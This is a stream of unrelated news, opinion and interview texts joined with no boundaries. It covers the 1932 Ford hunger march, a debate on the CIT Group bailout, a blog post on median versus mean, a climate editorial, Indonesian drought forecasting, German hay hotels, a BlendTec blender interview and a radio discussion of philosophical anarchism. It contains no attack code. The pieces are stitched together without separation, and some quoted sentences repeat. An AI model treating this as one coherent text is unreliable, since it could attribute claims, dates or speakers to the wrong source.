As a band played the International — the lyrics “ Arise , ye prisoners of starvation ” particularly fitting — some 80,000 joined the march to the cemetery .
In June a Black worker , Curtis Williams , died of wounds suffered during the march .
Segregation policies kept him from being buried with his comrades ; the funeral committee hired a plane and scattered his ashes over the cemetery — or by some accounts over the Rouge .
Attorney Maurice Sugar had written two months earlier that police brutality “ grows out of the institution of private property under which one class in society lives in luxury at the expense of the great mass of workers who are compelled to live in a state of poverty , wretchedness , and despair . ” ( Christopher H. Johnson , “ Maurice Sugar , Law , Labor and the Left in Detroit , 1912 - 1950 ” )
Although Sugar was able to convince the grand jury not to indict any of those arrested , no one was ever indicted for the Ford massacre .
In 1941 , after years of sacrifice and struggle , the Auto Workers union finally won recognition from the Ford dynasty .
In 1992 UAW Local 600 retirees bought five headstones — including one for Williams — and placed them by the four graves .
On each is carved the words , “ He gave his life for the union . ”
As workers begin again to fight evictions , foreclosures and the layoffs that cause them , the unyielding courage of the Ford hunger marchers is an inspiration .
Brendan McDermid / Reuters
The CIT Group , one of the nation ’s largest commercial lenders serving a million small and midsized companies , is on the verge of collapse now that federal officials have rebuffed pleas to rescue it with more taxpayer money .
It had received $ 2.33 billion bailout from the feds in December .
The company ’s failure would create a stark line between banks that the government deems too big to fail and those regarded as expendable .
Some observers have pointed out that if Lehman Brothers had acquired CIT in 2002 , when it was considering a deal , the two banks together would now be considered “ too big to fail . ”
Where should such a line be drawn ?
Does it send the wrong message to the banking sector when big banks are rescued when they engage in behavior that would otherwise be fatal for smaller institutions ?
Make the Line More Clear
James D. Hamilton is a professor of economics at the University of California , San Diego .
If the government were to insure all the creditors of every failed financial institution , it would mean that the bank gets to keep any gains while the taxpayers are stuck with any losses .
That creates incentives for the excessive risk - taking by private institutions that was one factor in causing the problems we currently face .
It ’s not socially desirable to bail out every failed bank , nor is it fiscally feasible , so we have to draw the line somewhere .
But for many of these institutions , the potential collateral damage to innocent bystanders from a financial collapse is sufficiently frightening that policymakers feel they need to step in to prevent further damage , despite concerns about the incentive problems that doing so may create .
So there is a process of fumbling around on a case - by - case basis as we try to figure out where to draw the line — prop up A.I.G. , let Lehman and CIT go .
Uncertainty about just who is going to be protected and who will be allowed to fail is yet another factor exacerbating the current instabilities .
Since there ’s no easy way out once we face that decision , the obvious answer is to use regulation to prevent any private institution from putting us in a position where policymakers feel their only option is a public bailout .
“ Too big to fail ” is , in my opinion , “ too big . ”
Too Many Bailouts , Not Too Few
Russell Roberts is a research fellow at Stanford University ’s Hoover Institution and professor of economics at George Mason University .
He is the host of EconTalk , a weekly award - winning podcast .
During the last 16 months , little justification has been provided for why some firms have been rescued while others have been allowed to fail .
It is not healthy for a democracy to have hundreds of billions of taxpayer dollars go to highly wealthy individuals without a clear explanation for why such behavior is necessary in some instances but not others .
The two most prominent failures are Lehman Brothers and now , very likely , CIT .
While CIT is relatively small , it is highly connected to many other businesses , particularly small businesses that depend on credit to manage their cash flow .
For decades , government policy and action have discouraged prudence by bailing out or taking over virtually every significant financial institution that has acted recklessly .
A similar justification was used for Bear Stearns ’s takeover , A.I.G. ’s total rescue , and G.M. ’s lifeline .
So why not save CIT ?
It is deeply disturbing that Lehman Brothers was a long - time competitor of Secretary Paulson ’s former firm , Goldman Sachs .
It is equally disturbing that the chief executive of CIT , Jeffrey Peek , has been a contributor to Republicans rather than Democrats .
This could be mere coincidence .
But the current and ad hoc bailout strategy inevitably creates suspicion and destroys faith in our economic and political system .
The bigger mistake has been the bailing out of too many firms rather than too few .
Capitalism is a profit and loss system .
The profits encourage risk - taking .
The losses encourage prudence .
For decades , government policy and action have discouraged prudence by bailing out or taking over virtually every significant financial institution that has acted recklessly .
Five years ago , well before the crisis , Gary Stern and Ron Feldman of the Minneapolis Fed , wrote “ Too Big to Fail , ” arguing that the continual rescue of debt holders and creditors was creating systemic risk in the financial system .
They pointed out the crucial role that debt holders and creditors play in monitoring and restraining risky investments on the part of financial institutions .
By consistently bailing out creditors , the power of that restraint was being destroyed .
They argued that we were encouraging excessive risk - taking and destroying the natural feedback loops of prudence that would otherwise restrain bad behavior .
They were right , but no one listened .
The same mistakes continue .
The ongoing rescue of virtually all creditors and counterparties of insolvent firms , rewards recklessness , creates an impression if not the reality of crony capitalism , and sows the seeds for the next financial crisis .
Bondholders Should Take the Risk
Mark A. Calabria is a former member of the senior professional staff of the Senate Committee on Banking , Housing and Urban Affairs , is director of financial regulation studies , Cato Institute .
The trouble with rescuing some institutions ( those within the favored circle of political protection ) is that they get to enjoy lower funding costs — with a related reduction in market discipline .
Of course , there are proposals for more oversight and regulation for institutions , whose existence is deemed important for the health of the entire financial system .
But the truth is , any additional regulation wo n’t offset the advantages of having the backing of government money .
The only sure way to end these inequality is to end “ too big to fail ” taxpayer support permanently .
The fact is , no bank is too large to fail , although some may be too large to resolve or re-organize in a quick and clean manner .
For those banks , a special bankruptcy court should be established to resolve these entities with greater certainty , and with no injection of taxpayer funds .
We should recognize that “ too big to fail ” is more a political problem than an economic one .
Equally important , we should recognize that “ too big to fail ” is more a political problem than an economic one .
The ability of the Fed and the Treasury to place hundreds of billions of taxpayer funds at risk must be limited , if not abolished outright .
Whenever a corporation becomes insolvent , the fundamental question is : who will bear the losses ?
In the bailouts of A.I.G. , Bear Stearns , Fannie , Freddie and the auto companies , the choice was made that the taxpayer would come to the rescue .
There is another deep pocket involved in all these companies : their bondholders .
In a highly leveraged institution , the only real discipline comes from the market .
While imposing losses on creditors will raise the cost of debt , it is not only appropriate , but necessary .
After all , artificially cheap debt contributed to our financial crisis .
We do not need to draw a line between the treatment of large , medium and small banks .
We need to erase the existing political boundary that favors some while leaving others to fail .
All institutions have to be open to failure — it is the reason why markets work .
Median vs. Mean : Know the Difference or Risk Being Manipulated
The definition of median and mean and the difference between the two terms is poorly understood by many people and while in many data sets , there is only a marginal difference between the two from a practical standpoint , there is sometimes a stark difference between the two .
As I ’ll outline in this article , people toss around terms like “ average ” , mean , median and other statistical nomenclature without either understanding what they ’re talking about themselves , or with the intent to silence critics with ‘ fact ’ .
Understand that various entities routinely manipulate how a piece of data is presented in order to beguile you , the recipient , in order to advance their agenda .
Median Mean – What ’s the Difference ?
By understanding the difference between median and mean , and what the implications are of each , you will be able to challenge such assertions and avoid being duped yourself .
First , a brief explanation of each , then some real life examples of median and mean that we can all relate to .
Let ’s take this set of 11 numbers :
2 3 3 4 7 9 11 12 14 17 25
The median and the mean are pretty close together , but different nonetheless .
See the attached Excel - generated output :
Definition of Arithmetic Mean : Simply add N numbers in a data set together and then divide by N.
Most people equate the arithmetic mean to their understanding of the term “ average ” .
The mean of 5 and 10 is 7.5 .
Note that excel has a median and mean function built in , whereby you can select a series of cells and have excel calculate the result for you .
Contrary to my warning about relying on “ Average ” to explicitly = “ Mean ” , in Excel , you need to use the “ AVERAGE ” FUNCTION in order to calculate an arithmetic mean ( I know , confusing , but that ’s the truth ) .
Also note that there are other types of means like Harmonic Mean and Geometric Mean , but they are generally reserved for more targeted , advanced scenarios .
Definition of Median :
The median of a data set is the middle number when the set is sorted in numerical order .
Since there was an odd number of data points above , going to the center to find 9 was easy .
In an even - numbered data set , you take the mean of the middle two numbers .
Definition of Mode :
The mode of a data set is the number that appears most frequently .
In the data set above , it would be 3 .
Because mode has little utility in most everyday applications , I did n’t focus a great deal on mode .
I can honestly say that I ’ve never heard a politician proclaim that the mode income is such and such .
“ Average ” does not always equate to “ Mean ” : Mean is the most oft - cited average , but that does not necessarily mean that the word average is equivalent to mean .
There are various types of averages : mean , median and mode being the most common .
So , if someone says , the average player bats .286 , they probably mean that .286 is the arithmetic mean , but technically that is not necessarily true unless they specify further which average they are referring to .
Because of this , many people will use the word “ average ” knowing full - well that their audience will associate it with arithmetic mean , when in fact , they may be referring to a median or mode and as such , the audience falls prey to statistical chicanery .
A Simple Median vs. Mean Example :
Here ’s one I like to use when describing the difference in practical terms .
You live in a town of 1000 residents who are all earning roughly $ 80,000 per year .
To keep it simple , the median and the mean are roughly $ 80,000 give or take .
Your town is real nice and reminds Warren Buffet of his childhood .
He decides to move in .
He takes in $ 1 Billion this year .
While the median income for the town remains at $ 80,000 ( because the middle number is still $ 80,000 as are the other 999 , there is only one outlier making a billion ) , the arithmetic mean income for the town is 1.08 Million Dollars !
So , Money Magazine ( or whatever your favorite finance mag is ) runs one of their usual stories about “ the country ’s richest towns ” , etc. and utilizes data mining software to crunch some numbers which reveals that the mean or what they consider “ average ” income is over $ 1 Million per year .
They conduct no actual investigative research before running with it .
They dub your town , “ The Town of Millionaires ” and runs this amazing story about how all these millionaires live in typical looking homes .
They ’re a real frugal bunch , look how much they make compared to the lifestyle they lead !
What an example for America !
If only they looked at the data and considered the median and the mean and tried to understand the difference .
Who Uses Median vs. Mean to Manipulate ?
For starters , politicians do all the time .
So do college professors and so does someone in your company that ’s looking to advance their agenda .
Ever have a debate at a dinner party and someone starts spewing out all kinds of statistics ?
Ever listen to the pundits on TV who are not actual experts in the area they ’re speaking to by any means , but they ’ve rehearsed the same line over and over again , so when the topic comes up on air , they robotically spew out some statistic that sounds real compelling ?
Chances are they have no idea what they ’re talking about .
They were spoonfed a “ statistic ” , but they do n’t know what it means .
Here ’s a more complex , but poignent hypothetical example :
You live in a town with an affluent side and a not so affluent side .
The folks on the affluent side have annual incomes in the $ 80,000 to $ 120,000 range while the opposing side ranges from $ 20,000 to $ 40,000 .
Therefore , the median and the mean of the affluent demographic is roughly $ 100,000 while that of the opposing side is roughly $ 30,000 .
The number of families in the affluent demographic is slightly larger than the number of families on the opposing side .
As such , the median family income is ~ $ 100,000 for the entire town while the mean income is closer to $ 65,000 .
Due to mismanagement of funds and a complete lack of fiscal oversight ( sound familiar ? ) , a significant tax levy is necessary to close a budge shortfall and prevent default and several municipal loans .
The local government seeks to impose a universal , one - time levy on all residents to fix their mess .
They propose a one - time levy of $ 5,000 on each family .
The politicians state , “ The Median Family Income in this town is $ 100,000 .
Surely , a 5 % tax hit on a one time basis is a small price to pay to shore up our town ’s funds and fix things once and for all ” .
While it may actually be a 5 % hit in pre-tax income to the affluent group , it ’s more like an 8 % hit to “ mean ” population ( which is meaningless because there is nobody that actually earns $ 65,000 so the mean is completely inconsequential ) and it is a 25 % hit to someone earning $ 25,000 !
Now , the debate over whether someone who earns less should pay an equivalent amount of the tax on a net basis vs. a % of income basis is one that occurs in all camps , but there ’s no doubt that the politician here was manipulating the audience to advance his agenda .
For all pratical purposes , it ’s clear that after tax and with the cost of living , a family earning $ 20,000 clearly does not have the means to forego $ 5,000 on a one time basis to support the initiative .
Why is This Important ?
The next time your hear a politician say ,
“ The average family in America will only see their taxes increase by 1 % ”
“ I promise you today … that the average tax deduction you ’ll see from my plan is $ 2,200 per family ”
“ The average family in America will see No tax increase ”
“ Only the richest 2 % of Americans will see their taxes increase ”
“ This health plan is only going to cost the average person $ 500 per year … and inaction is not an option ”
The next time you hear this , you know you ’re being manipulated .
If you enjoyed this article , subscribe for free to Darwin ’s Finance .
Are you evolved ?
More Fun with Numbers :
Net Present Value – Why You Should Use it in Everyday Life
UFirst Money Merge Mortgage Accelerator Program Cuts Your Mortgage – And Defies Logic
Lazy Portfolio Claims do n’t Add Up
Building Your Own Structured Note
Book Review : MicroTrends
401K Asset Allocation – What ’s in Yours ?
No related posts .
You 're Not Following Darwin's RSS ?
Check out Why You Have to Subscribe to Darwin's Finance
If you enjoyed this post , you can get free updates through RSS Feed or via Email whenever a new post is published .
Rest assured that you can unsubscribe at any time via the automated system and your information will not be sold , archived or utilized for any other " nefarious " purposes .
One would think that by now most people would have figured out that climate change represents a grave threat to the planet .
One would also have expected from Congress a plausible strategy for reducing the greenhouse gas emissions that lie at the root of the problem .
That has not happened .
The House has passed a climate bill that is not as strong as needed , but is a start .
There are doubts about whether the Senate will pass any bill , given the reflexive opposition of most Republicans and unfounded fears among many Democrats that rising energy costs will cripple local industries .
The problem , when it comes to motivating politicians , is that the dangers from global warming  drought , famine , rising seas  appear to be decades off .
But the only way to prevent them is with sacrifices in the here and now : with smaller cars , bigger investments in new energy sources , higher electricity bills that will inevitably result once we put a price on carbon .
Mainstream scientists warn that the longer the world waits , the sooner it will reach a tipping point beyond which even draconian measures may not be enough .
Under one scenario , atmospheric concentrations of greenhouse gases , now about 380 parts per million , should not be allowed to exceed 450 parts per million .
But keeping emissions below that threshold will require stabilizing them by 2015 or 2020 , and actually reducing them by at least 60 percent by 2050 .
SINGAPORE ( Reuters ) - A group of scientists are developing more accurate drought and harvest forecasts for Indonesia using tree rings , historic rice production figures and sea surface temperature data .
Indonesia is one of the world ’s most populous nations and a major producer of rice , cocoa , coffee and tobacco .
But the country is regularly at risk of drought caused by the El Nino phenomenon in which the eastern Pacific ocean heats up , with wet wetter moving toward the east and leaving drier weather in west around Southeast Asia and Australia .
U.S. scientist Rosanne D’Arrigo and her colleague Robert Wilson are working on simplified statistical models that can predict drought ahead of the main September - December rice planting season and how severe the drought might be .
The models focus on Java , one of the world ’s most densely populated islands with 120 million people .
“ We ’re trying to develop simple , predictive model of drought and crop productivity on Java .
There are complex models out there but you need to have a local type of analysis and something simple for local people to use , ” said D’Arrigo of the Lamont - Doherty Earth Observatory of the United States .
She was speaking to Reuters from Dalat in southern Vietnam where she was presenting her team ’s work at a climate change conference this week .
Wilson is from Scotland ’s University of St. Andrews .
A key part of the model is using sea surface temperature data from the tropical Pacific and from the Indian Ocean .
A separate phenomenon called the Indian Ocean Dipole can also cause drought in Australia and affect rainfall in Indonesia .
Other data such as sea - level pressure and wind indexes are also used .
The data are examined several months before the usual onset of the monsoon to try to accurately predict likely rainfall patterns over Indonesia .
D’Arrigo said she also found good agreement between the sea surface temperature model , a local drought index in Java and government data on crop productivity .
This suggested “ we could estimate not only the coming drought condition but also the kind of crop season you would expect to have , ” she said , adding she was also looking at a predictive model for the onset of the monsoon .
TREE RINGS
Her team also looked at tree rings from old teak trees in Java and Sulawesi island to build up a chronology of past droughts and found a very strong correlation with El Nino .
“ Indonesia is kind of unique in the sense that it ’s probably the area where you have the greatest ‘ ground - zero ’ climate signal related to El Nino , ” she told Reuters .
The oldest teak tree ring records came from the 16th century , she said , but added it had been hard work finding the remaining centuries - old teak trees .
“ It takes fair a bit of research .
You have to do a bit of detective work to find the few remaining last stands that have n’t been cut for furniture . ”
( CNN ) -- Holiday - makers around the world are facing up to the fact that , in times of recession , large travel expenses are difficult to justify .
German huehotel ' Zum Alten Marstall ' is at the foot of an 11th century castle and has adopted a medieval theme .
more photos »
While for some this has meant the end of life as we know it , for a new generation of nature lovers and eco-conscious tourists , it has prompted the discovery of a cheap and unusual alternative .
In Germany and its European neighbors Austria and Switzerland , a long weekend in a converted barn - sleeping on a bed of freshly raked hay -- is fast becoming the ' staycation ' of choice .
Heuhotels ( ' heu ' is German for hay ) offer exactly what their name suggests .
For as little as eight euros ( $ 11 ) a night backpackers , couples , families and , in the case of one " hay hotel " in central Germany - ' groups of up to 60 ' - can rest their heads in a way nature intended .
With private bedrooms and the option for " real " beds , the ' Zum Alten Marstall ' is at the " luxury " end of the market .
It also takes advantage of its position at the foot of the 11th century Castle Guttenberg by adopting medieval styling throughout .
Here staff wear embroidered tunics and woolen cloaks and male guests are referred to as " Knights . "
While not all hay hotels provide such elaborate extras , many offer a range of activities .
These typically include horse riding , canoeing , mountain biking and archery .
Foodies will also get the chance to buy fresh meat , cheeses and other farm produce on site .
Types of accommodation range from open lofts stuffed with bales of hay , to feed stalls furnished with wooden platforms .
And while some hotels include more civilized amenities like privacy curtains and bottles of wine to take to ' bed , ' most still require that guests bring their own sleeping bag and towels .
Would you stay in a hay hotel ?
Or have you stayed in one ?
Share your experiences in the SoundOff box below
The ' Hofgut , ' hay hotel situated just outside the small town of Kassell in the heart of Germany , has been operating for a few years now .
" I suppose some people might find the idea unappealing , " manager Sarah tells CNN , " but for anyone who wishes to snuggle up close to nature it 's perfect . "
To the skeptics she says : " Think back to when you were a child -- this would be heaven !
What 's changed since then ? "
Without the need for new construction , heavy laundry bills or other forms of high energy consumption , hay hotels are also an effective means of low - impact , sustainable tourism .
But it 's not just eco-warriors , spendthrifts and children who enjoy the pastoral allure of a converted barn .
" We have many important people from the city coming to stay here , all types that you would n't expect , " says Sarah , " what better way for a team to bond than by eating together around a camp fire and then rolling around in the hay ? "
For others , these hotels present an opportunity to fulfill long - held romantic ambitions -- hence they have become a very popular destination for weddings and honeymoons .
" For lovers , there 's nothing more exciting than a night on the hay , " says Heinz Laing , a former Greenpeace activist who runs a hay hotel outside Hamburg .
Just remember if you 're partial to the odd cigarette , all hay hotels operate a strict no -smoking in bed policy .
If you search for " iPod " on YouTube , the first thing that comes up is n't a silhouetted dancer doing the freak against a Technicolor background .
Nope , you get Tom Dickson , an otherwise bland grandfatherly - type from Utah , smiling sweetly next to a blender .
" Will it blend ? " he asks .
" That is the question . "
And then , Dickson drops a $ 400 iPod into the plastic maw of his BlendTec blender .
After a flip of the switch , the device is ground to dust in mere seconds -- a seemingly impossible feat for such an ordinary looking machine .
The iPod is n't the only thing to have met such a fate .
Dickson 's hugely popular series of " Will It Blend " videos have ground up golf balls , cell phones , marbles , light bulbs , and matches , to name a few .
The clips have become a viral marketing sensation for Tom Dickson , CEO of BlendTec , a Salt Lake City company whose main products are turbocharged , high - torque kitchen appliances .
A search for " BlendTec " or " Tom Dickson " now produces more than 18 million results on Google , he 's blended the wooden handle of a rake on The Tonight Show and even has his own T - shirt that says , " Tom Dickson is my homeboy . "
Esquire sat down with Dickson to find out about one man 's singular quest to build the perfect blender .
Then we got him to grind up one of our Esky music awards , which you can see above or on WillItBlend.com .
So when did you first realize that your blender could pulverize anything into a fine powder ?
One of the first things I did was I took a box of 250 matches ...
See , the blender did n't have a molded lid for the jar yet so I put a piece of plastic on it .
I hit the switch .
It blew up !
The matches really blew up !
I had on a sports coat and a long - sleeve shirt and the smoke shot up my sleeve and I remember wiggling my hand and being like Whooo !
I thought my hand was on fire .
The next thing I knew the smoke had gone to the ceiling .
We had to evacuate the building .
What 's the horsepower like on these blenders ?
We started at 1.8 horsepower and about ten amps , but now our entry - level machine -- what we do our " Will it Blend ? " blending with -- those are three horsepower and 13 amps .
We actually go all the way up to 20 amps , though .
That 's the most powerful machine in the industry , bar - none -- in fact you have to have a special 20 amp plug to run our top - of - the - line blenders .
We have n't really shown that blender in the videos yet .
What are the blades made out of and why do n't they break ?
Basically , the blades are made out of surgical stainless steel .
The reason they 're able to do what they do is just by virtue of high speed -- when you have blades that are going that fast , they can annihilate things that are even harder than they are .
Eventually , it 's going to ruin the blade .
We have a lifetime warranty on our blade doing normal blending , but certainly not doing two - by - fours .
Has anything ever not blended ?
Yeah .
Coins .
They wo n't blend .
And we can't blend a crowbar .
Millions of people have seen you online .
You even have your own T - shirt .
What 's it like being recognized in public ?
People either say , " Hey you 're the blender guy ! "
Or it 's , " Where have I seen you before ? "
About a month or so ago , I went into a Wal - Mart and walked back to the garden section and asked this older gentleman where all the rakes were .
A 75 - year - old lady was back there and she looked at me and said , " Oh no !
You 're the blender guy !
You 're gonna buy all the rakes ! "
[ One of Blendtec 's more famous videos shows Dickson blending a full - sized rake . ]
And I said , " I 'll tell you what -- come with me . "
We walked all the way to the front of the store and I said , " You wait here . "
Then I went and bought all the rakes and went out front and told her , " Here pick the rake you want , and I 'll take the rest . "
And I did .
Visit the " Will It Blend ? " site to see more videos .
This content is created and maintained by a third party , and imported onto this page to help users provide their email addresses .
You may be able to find more information about this and similar content at piano.io
This is the transcript for the original broadcast of this program ( 3 May 2008 ) .
Alan Saunders : Hello , and welcome to The Philosopher 's Zone .
I 'm Alan Saunders .
This week , what is at the moment probably one of the least fashionable of ' isms ' , anarchism .
The word derives from the Greek , it means ' without a ruler ' , and the idea is that all forms of government are oppressive and undesirable and should be abolished .
Now it has n't exactly swept the world , this idea , it 's only ever taken off a few times and in a few places , 19th century Russia for example , and early 20th century Spain .
So why has anarchism always played a minor role in political life and philosophy ?
Simply because it 's a bad idea ?
Or because the idea of life with no government to arrange things for us , sounds like a hot of hard work .
I mean who'd look after the drains ?
Or because anarchism conjures up images of crazed protesters with bombs or attacking police horses ?
Or is the State just too powerful and entrenched to disassemble ?
Today on The Philosopher 's Zone we ask , does anarchism still have something to offer ?
And to talk about this , we 're joined by Robert Paul Wolff , Professor of Afro-American Studies at the University of Massachusetts , Amherst , and author of more than 20 books , including The Poverty of Liberalism and In Defence of Anarchism .
Now In Defence of Anarchism was written in the heady days of 1965 , published in 1970 , later translated into more than ten languages and republished in 1998 .
It 's become a minor classic .
So , Robert Wolff , thank you very much for joining us .
Robert Wolff : I 'm delighted to be with you .
Alan Saunders : Let 's straight to it .
Can you lay out your basic arguments about why the State structure is inherently bad for individuals ?
Robert Wolff :
Well it 's really quite simple .
There is a fundamental obligation that each of us has to make his or her own moral decisions .
It goes by the name of autonomy , and the great 18th century German philosopher , Immanuel Kant was the philosopher who more than any other , emphasised the autonomy of the individual .
Over against that is the characteristic claim of virtually every State that has ever existed , namely , the claim that it has the right to rule , that it has a monopoly on the authoritative use of power , that it has the right to tax , that it has the right to require its subjects or citizens to obey the law , and so forth .
And what I did in this little book was to ask the question ' Is there any way in which the autonomy of the individual , it can be made compatible with the authority claims of the State ? '
Now the most plausible and these days the most popular answer to that question is ' Yes , in a democracy , because in a democracy the State speaks with the voice of the people . '
But of course it only speaks with a voice of the majority of the people , and therefore it is always in the position of compelling the minority to do what the minority thinks it is wrong to do .
And I explored that subject for some 80 pages or so , and came to the very simple conclusion that there is no way that the autonomy of the individual can be made compatible with the authority of the State , from which it follows that there is no such thing as a legitimate State .
It 's quite that simple .
Alan Saunders :
Well let 's approach the question from another direction and look at whether it might actually be right for individuals to surrender some of their autonomy , and we could do that by comparing anarchism with liberalism , a much more dominant trend in Western political thought .
Now liberalism often takes off from what 's called the state of nature argument .
We are living in a state of nature , that means that we have communities perhaps , if only because we have affections for others and we have family times , but we do n't yet have government .
However , we discover that there are things that we can't get done without a government to organise them for us .
The question then is how much of our natural liberty , if you like , our natural autonomy , we 're willing to exchange in return for the advantages of having a government .
It 's a trade - off .
So is the anarchist somebody who 's just not willing to engage in that trade - off ?
Robert Wolff : No , not at all .
But I think your characterisation of it is in a certain fundamental way , wrong .
There are lots of situations in which we find it necessary to go along with something we think is a bad idea , just because not going wrong would be worse still .
That 's not the question .
The State does n't say to us , Look , we want you to think about this , and I think we would be able to persuade you that this is one of those cases where you ought to do something you do n't think is the best thing to do just because it 's going to accomplish something that 's better than the alternative .
The State says
We , the State , have the right to command you , even if you think that we are fundamentally wrong and you have no right to challenge that , because we have the authority .
Suppose just to take a sort of a silly - sounding example : suppose you 're on a ship that has hit an iceberg and it's necessary to organise people to get off the ship very quickly , and everybody understands that the ship 's Captain is the person with the authority but unfortunately he 's been killed .
One of the passengers who sees this , puts the Captain 's cap on , and pretends to be the Captain in order to organise people and get them off the boat .
And suppose you know that that is n't really the Captain .
You might go along , even though you know that he does n't have any authority since he is n't the Captain , because you think that anybody who can get people organised and off the boat , will be doing a good thing .
And in the same way , I might find myself going along with the commands of a benevolent dictator , or a wise king or a not - so - bad President .
You can compare that with the claim that is made by the Roman Catholic church .
The Roman Catholic church in its wisdom , understands that it cannot command people to believe what they do not believe , it only commands them to submit to the authority of the church in the hope that they will come to believe what the church quite confidently thinks is the divine truth .
So the church does n't demand belief , which it cannot command , it only demands obedience , and that 's exactly what the State commands .
Alan Saunders :
Now let 's be clear : there are different types of anarchism , are n't there ?
Robert Wolff : Yes .
there are really four kinds of anarchism .
There is first of all your good old - fashioned , bushy beard , thick glasses , seedy clothes , bomb - throwing anarchist , the sort that you mentioned at the beginning of our discussion .
Then there is the second kind which is the libertarian anarchist , the sort of Ayn Rand , or as we say in the United States , Ron Paul anarchist .
This is the person who thinks that the only relationships between people in a society should be contractual relationships of a market - oriented sort .
So there ought to be no State .
If you need garbage collection , a private company does it ; if you need police protection , a private company offers it , or several do and compete with one another .
The third kind of anarchism is utopian or communitarian anarchism , the sort of anarchism of people who believe that the social relationships between people should be based on consensus , and so you get people going off and setting up little communities , typically farming communities , where there 's a good deal of sandals and candles and organic food , and everything 's decided by endless discussions , a little bit like a Quaker Meeting .
And then there are philosophical anarchists , who analyse the relationship between the authority claims of the State and the moral autonomy of the individual .
And I 'm a philosophical anarchist .
And the conclusions that I come to are in a sense the foundation for all of the other anarchisms .
Alan Saunders :
There 's a book called The Anarchists ' Cook Book .
It 's infamous and illegal collection of recipes for trouble , bomb - making , tips for making poisons etc .
It was written in 1970 , it was denounced by many anarchists .
But the association between anarchy and violence is still a pretty strong one in the public mind , and it's not as though anarchists have n't set off an explosive or two over the centuries , is it ?
Robert Wolff :
By and large the explosions that have been set off have not been set off by anarchists .
They have been set off in the first instance of course , by States .
I mean if you look at all of the violence that has been perpetrated on human beings over the centuries , or over the millennia , almost all of it has been perpetrated by States .
A small amount of it has been perpetrated by people committed to some ideology or other who are in effect , seeking to become the State , and then there is this tiny , tiny , tiny handful of people who show up say in Conrad 's The Secret Agent , or places like that , who can be thought of as bomb - throwing anarchists .
Alan Saunders : Now I imagine you might have a number of fans out there who read your book and would very much refuse to define themselves as anarchists .
I mean you 've already mentioned the sort of Ayn Rand people , and you only have to take some interest in the Republican primaries in the United States to see religious conservative republicans and libertarian republicans , who for sometimes different reasons abhor the State and all it does to impinge on their freedom .
So if we just stick with the politics and perhaps leave economics aside for the moment , but do left and right cease to have much meaning in this context ?
Robert Wolff :
Let me start to answer the question by saying that when I first published the book , I was abashed and made somewhat uncomfortable to receive several very praising letters from well - known right - wingers .
And a number of people have pointed out that at various points in American political history , the political spectrum has had something like the shape of a horseshoe with the extreme left and the extreme right closer to one another than they are to the middle .
But I am in fact an extreme left - winger , and the reason for that is that I can't leave economics aside .
That is , once I am finished confronting the question of the authority of the State , I am forced to go on to ask , ' And now what should we do ? ' and that that point my guide is not Bakunin , and it is not William Godwin , it is Karl Marx , I must confess .
When I say that I am an anarchist , I do n't mean that that is the principle on which my political activity is founded because my political activity is founded on economic concerns and moral concerns and foreign policy concerns , which anarchism simply does n't address .
And so I think of my anarchism as the starting point , not as the concluding point of my political journey .
Alan Saunders : Now Bob , you say that the great philosopher who attracted you to anarchism was the 18th century German thinker , Immanuel Kant .
Now I 'm sure he'd be turning in his grave , would n't he , if he heard that he was responsible for your anarchism ?
Robert Wolff : I 'm sure he 's spinning .
He would be appalled .
He was the very antithesis of any kind of anarchist you would want to mention .
However , he was a rigorous thinker , and he was absolutely committed to the primacy of the autonomy of the individual moral agent .
And by autonomy he meant what the Greeks meant , that is to say ' giving law to oneself ' .
By autonomy , he did n't mean lack of law , he meant law given by the individual to himself or herself , and that moral autonomy he thought was the foundation of ethical theory and the foundation of the State .
Now Kant happened in fact , to be a defender of democratic theory and thought that there were forms of democratic theory that could resolve this conflict , and I think he was wrong about that .
Indeed at one point , when I was lecturing on Kant 's ethical theory , I thought that I could follow his arguments through to the end and solve my problem , and I finally came to the conclusion that I could n't .
But I think of myself as grounding myself on Kant 's philosophy , because I begin with his conception of the rational , moral autonomy of the individual .
I might add , by the way , that in Massachusetts if you pay an extra fee , you can get licence points that have words or messages on them , and my licence plate actually reads ' I Kant ' .
Alan Saunders :
Do people think it just means , ' I can't , I 'm unable to ' ?
Robert Wolff :
Well about maybe 95 % of the people see it , think it means I can't , and think it 's some kind of ribald remark .
But every so often , somebody in a battered Volvo draws up behind me at a traffic light and waves , gives me a wave of the hand , and then I know I 've been understood .
Alan Saunders :
You 've also been known to compare Kant with the blues singer , Leadbelly .
Robert Wolff : Yes .
Well I should explain that when I studied Kant , I very quickly came to understand that he was the greatest philosopher who ever lived , and that his book , The Critique of Pure Reason was the greatest work he had ever written , and that the passage called ' The transcendental analytic ' was the hardest and most central passage of all of his philosophy .
Well when I was a kid , I was much enamoured of folk music and there was a great American folksinger named Huddie Leadbetter who went by the name , Leadbelly , who got himself in a good deal of trouble and was trice convicted of murder and sent off to chain gangs in Texas .
And Leadbelly used to sing for the other convicts when they were working on the chain gang .
Well when Alan Lomax , the great folklorist went around collecting folk songs and found Huddie Leadbetter , he put together an album of Leadbelly songs and on the liner notes , he described Leadbelly as ' the toughest men on the toughest chain gang in the toughest prison in Texas ' .
And I always thought of the transcendental analytic as ' the toughest passage in the toughest book by the greatest philosopher in the world ' , and I thought that 's what I need to tackle .
So my first book was a book on the transcendental analytic .
Alan Saunders :
Your book on anarchism has been on philosophy courses for decades now , and you 've modestly suggested that that 's because it 's short and it gives instructors something to refute .
But do you think that anarchist ideas have , over that period , changed the world at all ?
Robert Wolff :
The ideas have n't changed the world a bit .
But I 'll tell you what is changing the world , not books and not my anarchism , but the internet .
I am staggered by the way in which in this political season , the internet has transformed American politics , and I think will go on to transform politics around the world .
It has transformed a top - down political structure into a horizontal side - by - side political structure , in which the authority of those at the top , the authority of people in the mainstream media , the authority of the official commentators , is perpetually undermined by the flood of voices that appear on the internet .
And one of the things one discovers is that the comments made by unknown people out there in cyberspace , are very often as intelligent , as perceptive , as knowledgeable , and as thoughtful as the comments made by the official commentators one sees on the networks .
And I think that what is happening now is a transformation that will permanently change the way in which politics is organised , and in what is , if I may be somewhat optimistic , an anarchist direction .
Alan Saunders : Aside from the internet , we also have movies , and you 've argued that we have anarchism to thank , or perhaps to blame , for the Rambo movies .
Robert Wolff :
Well in a funny way .
That is to say , I 'm old enough - God help me , I 'm 74 - I can remember when I used to go to the movies always when I was a kid , and when you went to the movies back in the ' 40s and early ' 50s , if a man appeared in a movie in a suit and introduced himself as an FBI agent , you knew he was a good guy and you could trust him .
And one of the things that the Vietnam War did in the United States was to completely subvert and reverse that set of attitudes .
Now when you go to the movies , and somebody introduces himself as an FBI agent , immediately you know that this person can't be trusted and will probably turn out to be part of the problem , not part of the solution .
